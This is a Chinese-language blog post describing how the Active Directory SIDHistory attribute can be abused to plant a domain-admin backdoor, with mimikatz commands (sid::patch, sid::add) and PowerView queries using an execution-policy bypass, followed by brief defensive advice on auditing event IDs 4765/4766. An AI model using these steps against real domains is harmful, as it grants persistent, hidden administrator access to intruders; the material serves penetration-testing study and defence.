SIDHistory属性的利用

最新推荐文章于 2024-03-22 18:23:09 发布
最新推荐文章于 2024-03-22 18:23:09 发布
阅读量4.7w 收藏 2
点赞数 2
分类专栏: 权限维持 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/111612386
版权

文章目录

1. 前言

SIDHistory属性的存在是为了解决用户在迁移到另一个域中的时候权限会改变的问题。例如用户zhangsan在A域中本来是管理员,迁移到B域的时候因为sid的改变有可能会变成普通用户权限,这时候如果给zhangsan用户添加一个值为zhangsan在A域中的SID的SIDHistory值就可以解决这个问题,只有域管有更改SIDHistory的权利

2.对某用户的SIDHistory属性进行操作

以下操作都必须得在域控的权限下进行

2.1 查询zhangsan的SIDHistory

使用mimikatz

sid::query /sam:zhangsan

在这里插入图片描述

使用powerview

Set-ExecutionPolicy Bypass -Scope Process
. .\PowerView.ps1
Get-ADUser zhangsan -Properties sidhistory

在这里插入图片描述

2.2 给zhangsan用户添加域管的sid

privilege::debug
sid::patch
sid::add /sam:zhangsan /new:administrator
sid::query /sam:zhangsan

在这里插入图片描述

2.3 删除zhangsan的SIDHistory属性

sid::clear /sam:zhangsan # 清除SID History

在这里插入图片描述
发现SIDHistory已经消失。

3.利用思路

我认为共有两种利用思路,第一种是给域内低权限用户配置SIDHistory让其拥有域控权限。第二种方式是渗透测试的途中发现某个用户的SIDHistory是高权限的sid,那么这个用户就直接具有了高权限。

3.1 权限维持

如果已经拿到域控权限,可以给域内一个普通账号配置sidhistory,这样子域内的普通账号也就具备了域控的权限,具体操作方法上面也已经写过了。

3.2 利用当前用户的sidhistory属性

通过powerview直接查询域内具有sidhistory属性的用户:

Set-ExecutionPolicy Bypass -Scope Process
. .\PowerView.ps1
Get-DomainUser | select sidhistory,cn

如下图所示,如果当前控制的用户是zhangsan,那我们就直接拥有了域控的权限(域控权限的RID)是500,也可以直接访问域控的C$:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

防御方法

1.经常检查域用户中SID为500的用户,对这些用户的行为进行跟踪。

2.完成域迁移工作后,对有相同SID History属性的用户进行检查。

3.定期检查ID为4765和4766的日志,4765为将SID History属性添加到用户的日志;4766为将SID History属性添加到用户失败的日志。

Shanfenglan7
关注
专栏目录
内网渗透-域内的权限维持
lza20001103的博客
10-01 1035
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持,权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
SID History域权限维持
weixin_41082546的博客
05-05 597
一、简介   每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。   如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,如果迁移后用户的SID值改变,系统会将原...
权限维持之:SID History 域控权限维持
f_carey的博客
12-18 955
权限维持之:SID History 域控权限维持1 SID 作用2 利用 SID History 操作过程3 SID History 权限维持的防御 1 SID 作用 ​ 每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。 ​ 如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限
关于SidHistory
weixin_30952535的博客
08-12 226
先说明一下什么是SID历史,SID不可能重复,二个域迁移为了保持原有域的安全性微软在对象的属性中添加了SidHistory这一属性,其实SidHistory也就是原域的SID。如果在做二个森林之间的帐号迁移(使用ADMT2.0)且做了双向信任并加了/EnableSidHistory参数,WIN2000SP4/WIN2003默认会做FilterSIDs的操作,此时迁移帐号时会过滤掉源域的SID,即在...
domain SID History attributes
include_heqile的博客
10-29 445
原文链接 domain SID History attributes主要用来支持域的迁移 每一个域用户都有一个SID用于标识安全主体以及该用户对特定资源的访问权限。 SID History使得被克隆的用户可以访问之前用户能够访问的资源。这样就可以保证当一个用户迁移到另一个域中之后仍然可以访问以前所在域中的资源。 因为用户迁移到新的域之后,他的SID就会发生改变,所以需要将其原来的OLD SID映射...
渗透测试之子域到父域的横向移动(Sid History)
Candour_0的博客
02-20 389
渗透测试之子域到父域的横向移动(Sid History)
域渗透|域权限维持之SID History
weixin_42282189的博客
09-06 389
作者:r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 SID的主要作用是跟踪安全主体控制用户连接资源时的访问权限。 SID History 是在域迁移过程中需要使用的一个属性SID History 主要作用是在域迁移过程中保持域用户的访问权限,如果迁移后域用户的SID改变了,系统会将其原来的SID添加到迁移用户的SID History 属性中,使迁移后的用户保持原有的权限、能够访问其原来可以访问的资源。 因此使用mimikatz可以将SID His.
利用Powershell快速导出域控所有用户Hash
weixin_33862041的博客
03-08 879
三好学生 · 2015/11/04 10:280x00 前言之前在《导出当前域内所有用户hash的技术整理》中测试了5种导出域内所有用户hash的方法,经过这一段时间的学习和实践,找到了新的方法,也很有效,分享给大家。0x01 简介对于离线导出域控所有用户Hash,NTDSXtract依旧是主流优点:获取信息全面 稳定,上G的ntds.dit文件也可以正常解析 复制代码缺点:耗时,对于大型数据库,...
『AD域攻防实践』第二期学习笔记
ZAWX_NETSTARSEC的博客
09-13 674
上一周的直播课中,小伙伴们跟随御守实验室的师傅一起了解了“AD域在攻防对抗场景下的安全现状”,课程结束后,我们为大家整理了学习笔记,也将录屏和PPT公布在了公众号和微信群,帮助大家查漏补缺。 在小伙伴们的热情支持下,『AD域攻防实践』系列第二期也成功于9月6号晚20:00在bilibili圆满结束。 本期主要内容为“AD域安全风险“,由GPP老师讲解,为了方便大家对域内风险有更全面深入的理解,GPP老师按照攻击阶段,将域内风险分为信息收集、横向移动、权限提升和权限维持四个部分,深入浅出地为我们讲
SID History域后门及检测思路分析
最新发布
#7的博客
03-22 935
可以看成是黄金票据的一种拿到krbtgt之后将高权限用户的SID History添加到低权限的用户中注入到内存进行Dcsync或进行远程登录等,需要注意的是该操作并不会在域控的LDAP属性中添加,只会在攻击机的票据PAC中添加到高权限SID History。privilege::debug sid::patch sid::add /sam:whoami/new:Administrator (将Administrator的SID添加到whoami的SID History属性中)
域内权限维持:SID History后门
01-29 364
01、简介 每个用户都有一个关联的安全标识符(SID),SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。 02、利用方式 (1)使用域管理员权限查看test用户的SID History属性 PS C:\Users\Ad...
域渗透 - 权限维持 SID History
whojoe的博客
08-03 431
域渗透 - 权限维持 SID History环境搭建SID History属性介绍利用条件利用同一个域内同一域树下的提权利用方式参考文章 环境搭建 这里需要父子域 可以参考 https://blog.csdn.net/qq_43645782/article/details/119330508 机器名 ip 用户 密码 dns fad.test.com 192.168.164.146 administrator Aa1234 192.168.164.146 cad.ch.test.com
权限维持 SID-history
m0_64815693的博客
06-04 101
权限维持 SID-history
ADMT 迁移后用户或群组的SID HISTORY删除
weixin_34248023的博客
11-18 262
Technorati Tags: 夏明亮,ADMT,SIDHISTORY,删除,清除,clear,remove 大家都知道在两个林(域)之间迁移账户可以使用ADMT工具,他可以帮助我们把源域中账户迁移到目标域中,并把源域账户的sid赋予目标域账户的SIDHISTORY属性中,使得目标域账户可以使用sidhistory属性来继续拥有源于中的账户的权限。 ...
[原创]ADMT2.0迁移案例+SIDHistory验证(第二版)-转自Winmag 作者:江小帅
技术日志
05-24 5986
[原创]ADMT2.0迁移案例+SIDHistory验证(第二版)转自:Winmag.com.cn 作者:江小帅http://desperado.blogdriver.com/仅以此篇文档献给本人(江小帅)的女朋友,因为她的存在《ADMT迁移案例+SIDHistory验证第二版》才推迟了1个多星期。她在正常作息时间上对小帅的苛刻要求才真正是这篇文档发布的绊脚石。正是在她“坚决按时吃饭、绝对保证睡眠
域控权限持久化之SID History域后门
谢公子的博客
02-27 2028
每个用户都有自己的SIDSID的作用主要是跟踪安全主体控制用户连接资源时的访问权限。SID History是在域迁移过程中需要使用的一个属性。 如果将A域中的域用户迁移到B域中,那么在B域中新建的用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将...
利用SID History建立隐蔽域后门
内心不种满鲜花就会长满杂草
03-02 270
SID History是一个支持域迁移方案的属性,使得一个账户的访问权限可以有效的克隆到另外一个账户,这在域迁移过程中非常有效。例如,当Domain A中的用户迁移到Domain B时,会在Domain B中创建一个新的用户账户,并将Domain A用户的SID添加到Domain B的用户账户的SID History属性中。在实战中,红队人员可以将域管理员用户的SID添加到其他域用户的SID History属性中,以此建立一个隐蔽的域后门。通过powershell查看yuwin7用户的属性
Windows用户管理
柒烨~的博客
04-26 4725
Windows用户管理 基础知识 详细笔记
Exchange Server 5.5 迁移到 Exchange 2003 的详细步骤
通过复制源帐户的SID到新用户的SIDHistory属性,新用户可以访问旧帐户的所有资源,只要两个域之间有信任。 总结来说,Exchange Server的迁移是一个涉及多步骤的复杂过程,需要谨慎操作以确保数据安全和业务连续性。...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值